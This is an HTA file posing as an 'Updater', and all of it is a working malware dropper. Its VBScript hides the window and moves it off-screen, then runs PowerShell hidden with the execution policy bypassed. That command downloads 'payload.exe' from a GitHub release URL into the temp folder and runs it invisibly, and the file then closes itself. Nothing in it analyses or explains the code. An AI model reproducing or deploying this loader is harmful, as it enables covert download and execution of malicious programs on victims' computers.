<hta:application
  id="oHTA"
  applicationname="Updater"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"  <!-- Prevents flicker -->
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  Window.resizeTo 0, 0  <!-- Ensure window is invisible -->
  Window.moveTo -2000, -2000  <!-- Move off-screen -->

  Set objShell = CreateObject("Wscript.Shell")
  
  ' Run PowerShell in a completely hidden way
  objShell.Run "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""$url='https://github.com/jozef800/discord/releases/download/v7.0/payload.exe';$out='%temp%\payload.exe';(New-Object Net.WebClient).DownloadFile($url, $out);Start-Process -WindowStyle Hidden $out""", 0, False

  ' Close HTA immediately
  Self.Close()
</script>
